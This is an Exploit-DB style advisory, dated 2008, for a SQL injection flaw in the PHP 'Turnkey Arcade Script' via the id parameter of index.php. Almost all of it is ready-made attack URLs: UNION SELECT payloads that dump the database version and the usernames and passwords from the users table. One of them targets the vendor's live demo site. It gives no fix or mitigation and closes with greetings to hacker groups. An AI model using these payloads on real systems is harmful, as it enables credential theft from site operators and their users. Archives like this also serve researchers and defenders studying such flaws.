Turnkey Arcade Script - SQL Injection (1)

EDB-ID:

7256


Platform:

PHP

Published:

2008-11-27

----------------Mor0ccan Nightmares----------------

------------------------------
Script: Turnkey Arcade Script-
------------------------------

-----------------------------------
Site: http://www.turnkeyarcade.com-
-----------------------------------

-----------------------------------------------------------
Author: The_5p3ctrum <sp3@linuxmail.org> <5p@linuxmail.org>-
-----------------------------------------------------------


-----------------------------------------------------------------------
Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
-----------------------------------------------------------------------
---
Ex:
---

http://localhost/index.php?action=play&id=[sql]
http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users

--------
exploit:
--------

http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users

-----
Demo:
-----

http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users

-------
Greetz:
-------

Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...

# milw0rm.com [2008-11-27]